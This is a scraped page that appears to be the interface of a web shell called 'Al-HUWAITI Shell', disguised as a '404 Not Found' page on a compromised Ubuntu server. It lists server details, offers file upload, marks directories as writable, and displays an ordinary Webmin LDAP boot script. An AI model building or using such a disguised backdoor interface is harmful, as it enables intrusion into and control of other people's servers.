hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /usr/share/webmin/ldap-server/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/webmin/ldap-server/bootup.cgi
#!/usr/bin/perl
# Enable or disable the LDAP server at boot

require './ldap-server-lib.pl';
&error_setup($text{'bootup_err'});
&local_ldap_server() == 1 || &error($text{'slapd_elocal'});
$access{'start'} || &error($text{'bootup_ecannot'});
&ReadParse();

&foreign_require("init", "init-lib.pl");
$iname = $config{'init_name'} || $module_name;
if ($in{'boot'}) {
	$pidfile = &get_ldap_server_pidfile();
	&init::enable_at_boot($iname, "Start OpenLDAP server",
			      "$config{'slapd'} 2>&1 </dev/null",
			      "kill `cat $pidfile`");
	}
else {
	&init::disable_at_boot($iname);
	}
&webmin_log("boot", undef, $in{'boot'});
&redirect("");


Al-HUWAITI Shell